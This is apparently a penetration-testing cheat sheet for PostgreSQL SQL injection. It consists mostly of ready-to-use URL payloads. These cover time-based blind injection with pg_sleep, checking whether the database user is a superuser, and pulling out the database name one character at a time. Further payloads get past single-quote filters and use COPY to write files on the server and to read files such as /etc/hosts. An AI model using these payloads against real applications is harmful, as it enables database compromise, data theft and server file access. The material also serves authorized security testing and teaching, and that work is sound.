Skip to content

PostgreSQL

Time-based Blind SQLi Confirmation (pg_sleep)

Use this when the application does not return SQL errors or query output. In PostgreSQL, pg_sleep() gives you a timing to validate blind SQL injection.

Simple timing probe: if response time increases by ~10s, injected SQL is likely executing.

{URL}&userId=1;select+pg_sleep(10);--

Conditional sleep (sleep only when condition is true):

Boolean blind check: delay happens only when the condition evaluates to true.

{URL}&userId=1;SELECT+CASE+WHEN+(SELECT+current_setting($$is_superuser$$))=$$on$$+THEN+pg_sleep(5)+END;--

Control request pair (true/false):

Calibration pair: run both and compare timings to reduce false positives from network jitter.

# TRUE branch -> delayed response
{URL}&userId=1;SELECT+CASE+WHEN+1=1+THEN+pg_sleep(5)+END;--

# FALSE branch -> fast response
{URL}&userId=1;SELECT+CASE+WHEN+1=2+THEN+pg_sleep(5)+END;--

Character-by-character extraction pattern:

Character extraction primitive: test one position at a time and infer value from delay/no-delay.

# Example: test whether first character of current_database() is 'm' (ASCII 109)
{URL}&userId=1;SELECT+CASE+WHEN+ascii(substr((SELECT+current_database()),1,1))=109+THEN+pg_sleep(5)+END;--

Quote-Restricted Context Bypass

Use these when single quotes (') are filtered or break parser context.

Baseline example (uses single quotes). If your input filter blocks ', this style will fail and you need quote-free alternatives below.

SELECT 'HACK';

CHR + concatenation (quote-free)

Build strings from ASCII values without using '.

SELECT CHR(72) || CHR(65) || CHR(67) || CHR(75);

Same approach with concat().

SELECT concat(chr(72),chr(65),chr(67),chr(75));

Dollar-quoted string constants.

Often the cleanest replacement for single-quoted literals.

SELECT $$HACK$$;
SELECT $TAG$HACK$TAG$;

Accessing the File System

Writing content to files

DROP TABLE IF EXISTS HACK;
CREATE TEMP TABLE HACK(content text);
INSERT INTO HACK(content) VALUES ($$lorem$$); 
-- linux host
COPY HACK(content) TO $$/tmp/test.txt$$;
-- windows host
-- COPY HACK(content) TO $$C:\Program Files (x86)\PostgreSQL\9.2\data\test.txt$$;

One-shot URL payload for the same workflow (create table + insert + file write).

{URL}&userId=1;DROP TABLE IF EXISTS HACK;CREATE TEMP TABLE HACK(content text);INSERT INTO HACK(content) VALUES ($$lorem$$);COPY HACK(content) TO $$/tmp/test.txt$$;--

Reading content from files

Read file content into a temp table via COPY ... FROM, then select it.

Use CSV mode with uncommon one-byte delimiter/quote characters so each full line is treated as one text column.

DROP TABLE IF EXISTS HACK;
CREATE TEMP TABLE HACK(content text);
-- linux host
COPY HACK(content) FROM $$/etc/hosts$$ WITH (FORMAT csv, DELIMITER '|', QUOTE '~');
-- windows host
-- COPY HACK(content) FROM $$C:\windows\win.ini$$ WITH (FORMAT csv, DELIMITER '|', QUOTE '~');
SELECT content FROM HACK;